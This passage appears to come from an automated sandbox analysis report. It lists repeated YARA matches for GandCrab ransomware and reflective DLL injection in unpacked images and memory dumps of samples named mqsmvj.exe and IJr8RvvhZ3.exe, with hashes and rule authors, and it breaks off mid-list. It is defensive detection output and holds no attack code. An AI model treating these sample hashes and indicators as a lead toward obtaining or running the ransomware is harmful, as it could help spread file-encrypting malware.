                Source: 30.3.mqsmvj.exe.3470000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 35.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 35.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 35.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 35.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 35.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 34.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 34.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 34.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 34.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 34.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 36.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 36.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 36.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 36.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 36.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 23.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 23.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 23.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 23.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 23.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 37.3.mqsmvj.exe.3bc0000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 37.3.mqsmvj.exe.3bc0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 37.3.mqsmvj.exe.3bc0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 37.3.mqsmvj.exe.3bc0000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 37.3.mqsmvj.exe.3bc0000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 0.3.IJr8RvvhZ3.exe.3210000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 0.3.IJr8RvvhZ3.exe.3210000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 0.3.IJr8RvvhZ3.exe.3210000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 0.3.IJr8RvvhZ3.exe.3210000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 0.3.IJr8RvvhZ3.exe.3210000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 11.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 11.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 11.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 11.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 11.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 0.2.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 0.2.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 0.2.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 0.2.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 0.2.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 27.3.mqsmvj.exe.3490000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 27.3.mqsmvj.exe.3490000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 27.3.mqsmvj.exe.3490000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 27.3.mqsmvj.exe.3490000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 27.3.mqsmvj.exe.3490000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 19.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 19.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 19.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 19.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 19.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 12.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 12.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 12.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 12.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 12.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 16.3.mqsmvj.exe.3b50000.0.raw.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 16.3.mqsmvj.exe.3b50000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 16.3.mqsmvj.exe.3b50000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 16.3.mqsmvj.exe.3b50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 16.3.mqsmvj.exe.3b50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 12.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 12.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 12.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 12.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 12.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 28.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 28.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 28.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 28.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 28.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 37.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 37.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 37.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 37.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 37.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 14.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 14.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 14.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 14.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 14.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 00000017.00000003.471429233.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 00000017.00000003.471429233.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 00000017.00000003.471429233.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 00000017.00000003.471429233.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 00000017.00000003.471429233.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 0000000B.00000003.321306914.0000000003290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 0000000B.00000003.321306914.0000000003290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 0000000B.00000003.321306914.0000000003290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 0000000B.00000003.321306914.0000000003290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 0000000B.00000003.321306914.0000000003290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 00000019.00000003.501007155.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 00000019.00000003.501007155.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 00000019.00000003.501007155.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 00000019.00000003.501007155.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 00000019.00000003.501007155.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 00000013.00000003.435943163.0000000003930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 00000013.00000003.435943163.0000000003930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 00000013.00000003.435943163.0000000003930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 00000013.00000003.435943163.0000000003930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 00000013.00000003.435943163.0000000003930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 0000001E.00000003.596521661.0000000003470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
